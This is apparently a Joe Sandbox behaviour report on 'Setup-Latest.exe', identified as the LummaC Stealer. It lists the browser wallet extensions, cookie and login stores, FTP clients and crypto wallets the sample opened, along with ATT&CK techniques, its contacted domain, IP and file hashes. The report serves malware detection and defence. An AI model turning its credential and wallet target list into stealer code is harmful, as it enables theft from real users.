      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts121
      Windows Management Instrumentation      		1
      Scripting      		12
      Process Injection      		11
      Masquerading      		2
      OS Credential Dumping      		21
      Security Software Discovery      		Remote Services11
      Input Capture      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		11
      Input Capture      		21
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection      		Security Account Manager3
      Process Discovery      		SMB/Windows Admin Shares31
      Data from Local System      		13
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS13
      File and Directory Discovery      		Distributed Component Object Model1
      Clipboard Data      		Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets25
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Setup-Latest.exe19%VirustotalBrowse
      Setup-Latest.exe19%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\562639\Wages.com0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://zengardxen.cyou/api0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      zengardxen.cyou
      		188.114.97.3
      		truetrue
        		unknown
        jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQ
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://zengardxen.cyou/apitrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/XWages.com, 0000000D.00000000.1763368679.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Decorating.9.dr, Wages.com.1.drfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorSetup-Latest.exefalse
              		high
              https://www.autoitscript.com/autoit3/Volunteers.9.dr, Wages.com.1.drfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                188.114.97.3
                		zengardxen.cyouEuropean Union
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1615219
                Start date and time:2025-02-14 16:54:20 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Setup-Latest.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@28/23@2/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 26
                • Number of non-executed functions: 39
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 4.175.87.197
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:55:21API Interceptor8x Sleep call for process: Wages.com modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.97.3engine.ps1Get hashmaliciousFormBookBrowse
                • www.serenityos.dev/rmwo/
                PDF SCAN COPY P.O7767.exeGet hashmaliciousFormBookBrowse
                • www.actpisalnplay.cyou/oxsm/
                AGODA COMPANY PTE LTD.exeGet hashmaliciousFormBookBrowse
                • www.baurishu.info/6oy6/?_j=6nA47ZHp&FZQ=7xOMRooSSsdqiPLUwJdUBA7jSGBkvIlXa8t/xkLysZwhALyZ/D1DnA5RJCtzQ0mexpIl7jsdSrCncqt0u60b9lReTIu2hx5TfEdYnkD0kAiXAP2WKA==
                bHYg.exeGet hashmaliciousFormBookBrowse
                • www.actpisalnplay.cyou/3vjo/
                Payment -Advice-6UoSFOxOntvuu94-PDF.exeGet hashmaliciousFormBookBrowse
                • www.desktitle.homes/bc93/
                BINATONE LLC RFQ.Vbs.vbsGet hashmaliciousFormBookBrowse
                • www.trosky.lol/o88r/
                JJ0tnjLiDS.exeGet hashmaliciousFormBookBrowse
                • www.adventurerepair24.live/gc4d/
                Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbeGet hashmaliciousFormBookBrowse
                • www.actpisalnplay.cyou/c6as/
                (BBVA) SWIFT_consulta_de_operaciones 10-02-2025-PDF.exeGet hashmaliciousFormBookBrowse
                • www.timeinsardinia.info/50g8/
                swift copy.exeGet hashmaliciousFormBookBrowse
                • www.timeinsardinia.info/a84t/

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSSPECIFICATIONS112025.exeGet hashmaliciousSnake KeyloggerBrowse
                • 104.21.32.1
                https://notifications.google.com/g/p/ANiao5qKfpKGd2jYVQDb7vORoVGY96M_apQZWQcfuLgUh0GZyBJANTtYK9_noZQ1711qN-Nnm0DMf_B0c07RxsIpTsLOXIG6nNUkP7-522wWZZkizIeUQoaYMxfvubAPN7K6vgKfJCjpF3Y3VSFZPtNm5n34HM86QMFnOVYHFycjRojvprEeSViyQqV_RbPVd9Nh3y1jQx8FWiMJd_UXkRWlNs4Get hashmaliciousUnknownBrowse
                • 172.67.75.11
                http://hep2go.comGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                SecuriteInfo.com.Win32.MalwareX-gen.16584.17867.exeGet hashmaliciousLummaC StealerBrowse
                • 104.21.33.245
                SecuriteInfo.com.Win32.CrypterX-gen.27676.31428.exeGet hashmaliciousLummaC StealerBrowse
                • 104.21.64.1
                https://click-v4.mainexclkdir.comGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                http://office.biofcnn.com/GrEkVrfgGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                • 104.19.229.21
                https://click-v4.mainexclkdir.comGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://drive.google.com/uc?export=download&id=1CmHgECvh_EHGsZqLVn0a5drEg1A7U8vxGet hashmaliciousUnknownBrowse
                • 104.18.41.137
                http://hookersbaits.co.ukGet hashmaliciousUnknownBrowse
                • 104.17.25.14

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Win32.MalwareX-gen.16584.17867.exeGet hashmaliciousLummaC StealerBrowse
                • 188.114.97.3
                SecuriteInfo.com.Win32.CrypterX-gen.27676.31428.exeGet hashmaliciousLummaC StealerBrowse
                • 188.114.97.3
                Ux9pGQCe7d.exeGet hashmaliciousLummaC StealerBrowse
                • 188.114.97.3
                t5vT1k9gg6.exeGet hashmaliciousAmadey, Healer AV Disabler, LummaC Stealer, PureLog Stealer, RedLine, Xorist, zgRATBrowse
                • 188.114.97.3
                PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                HFLnponMjX.exeGet hashmaliciousLummaC StealerBrowse
                • 188.114.97.3
                asdasdasdasd.docx.docGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Lumma.exeGet hashmaliciousLummaC StealerBrowse
                • 188.114.97.3
                SecuriteInfo.com.Win32.Evo-gen.7075.31767.exeGet hashmaliciousLummaC StealerBrowse
                • 188.114.97.3
                1w5RpHuliE.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, VidarBrowse
                • 188.114.97.3

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\562639\Wages.comXKNN9fS4Tr.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, PureLog StealerBrowse
                  qNXDfsU2K7.exeGet hashmaliciousUnknownBrowse
                    H5S6rm5oQ9.exeGet hashmaliciousUnknownBrowse
                      qNXDfsU2K7.exeGet hashmaliciousUnknownBrowse
                        H5S6rm5oQ9.exeGet hashmaliciousUnknownBrowse
                          ThsoAuzU1L.exeGet hashmaliciousUnknownBrowse
                            ThsoAuzU1L.exeGet hashmaliciousUnknownBrowse
                              AxQgcpYNXx.exeGet hashmaliciousUnknownBrowse
                                nykfsekawddd.exeGet hashmaliciousBlackshadesBrowse
                                  random.exeGet hashmaliciousAmadey, AsyncRAT, LummaC Stealer, PureLog Stealer, zgRATBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\562639\G

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):529571
                                    Entropy (8bit):7.999626419165469
                                    Encrypted:true
                                    SSDEEP:12288:BWT1PcCV6PdbVjJ7qK9SuaKh8M48AJ4hlyHCpnDk9LB2NwPDH:i1UO6PdWKQKeF4hlycDk92wPDH
                                    MD5:3C2D7A5C987B05E3941DD6EFFD48FAA7
                                    SHA1:BA99E1C7EE435ABC80058CE8A9472115082C31FB
                                    SHA-256:21EE5E1BA7E6CBF8B183A93E4CCA1EA9266C5CF03A24F4D47D5F5682D90849F4
                                    SHA-512:9E273F2A017DFAFEB876C26E3C8BAA490D8BB429BF2F7CBF8B61B0B731E166C3CAC0D4FD8E266CD93411603A4D1578D4F6C5ED536BC2EF0FE835EF35EF8D6943
                                    Malicious:false
                                    Preview:..-..8..*..J3....K.z..R:...H.:....".F. ...B5.4L,.....Fu.k..5.1..uSw.J.|....>...Xt........tyN[V;.<....*v.:<6.f'R..=..k|..].].Q....DL..:.h....v"t.!...h.T..e.2.^...M."..Ny.nb...:.e............X..(+R.k.w..L....I.gg.....2O0C......}.5H..B....~.l.3KB..ZM..;.......A:u..e..0.4..v+..p..."..{O.b-.;..~.2p.o.$.*;.(....C.!...x_..Z[....3..........+R..q_...|l..q....d.JUC.,..7..%.3P.}.t-.+..?~..f+.\"`.p..D...*.F..!....n..j..{.s......HU./p.o.48w...a.Y.x....w.I..~|....!bm../.j...f.o...V....C.'..3..~.4:?....gJs...|....-C.........x1.0.........D..J.....+...^.g.|...>L....zj&PO.q.6...*..]..k.[jG...~.L.i.!...>S..?1..D4.qG.m.m....l......I....).SN}Z*.}....r.^..@......RF..x.u......1.....z>...{..XM......S..S*D.....E......0.....4V.m}.~...M&.c.j.W..I+1m/.;sU.....18=.b.5.....!=....*..N&.SZO.A..t.2...[.8y.|.<Q.~....8.fd.....Xl...X...Z.AH..6A.......0>.8...c.[.b^...6.z..?.M.m..Z.r.&..a.\.:m4.F...>....u.!.d'.S.C.]k7....v...0.-.........~.95..e.:.:....Ag.w...7...U.i....f^@..K

                                    C:\Users\user\AppData\Local\Temp\562639\Wages.com

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):947288
                                    Entropy (8bit):6.630612696399572
                                    Encrypted:false
                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                    MD5:62D09F076E6E0240548C2F837536A46A
                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
